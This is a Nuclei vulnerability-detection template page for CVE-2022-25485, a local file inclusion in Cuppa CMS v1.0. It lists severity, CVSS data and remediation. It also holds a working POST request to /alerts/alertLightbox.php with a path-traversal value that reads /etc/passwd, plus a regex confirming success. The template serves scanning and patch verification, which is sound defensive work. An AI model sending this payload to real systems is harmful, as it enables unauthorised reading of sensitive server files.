Cuppa CMS v1.0 - Local File Inclusion
ID: CVE-2022-25485
Severity: high
Author: theamanrawat
Tags: cve,cve2022,lfi,cuppa,cuppacms
Description
Section titled “Description”CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertLightbox.php.
YAML Source
Section titled “YAML Source”id: CVE-2022-25485
info: name: Cuppa CMS v1.0 - Local File Inclusion author: theamanrawat severity: high description: | CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertLightbox.php. impact: | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Upgrade to the latest version of Cuppa CMS or apply the vendor-provided patch to fix the LFI vulnerability. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-25485 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-25485 cwe-id: CWE-829 epss-score: 0.00648 epss-percentile: 0.78876 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: cuppacms product: cuppacms tags: cve,cve2022,lfi,cuppa,cuppacms
http: - raw: - | POST /alerts/alertLightbox.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
url=../../../../../../../../../../../etc/passwd
matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0"
- type: status status: - 200# digest: 4a0a00473045022100fa802848c3230c280cd2d4f95e85ae2569e4cc10308eac0099abd15ddcb445a302207f32b016abd2f13524f51a6671147348ae6d7a2683a88f7c6f5970171be1b9e6:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-25485.yaml"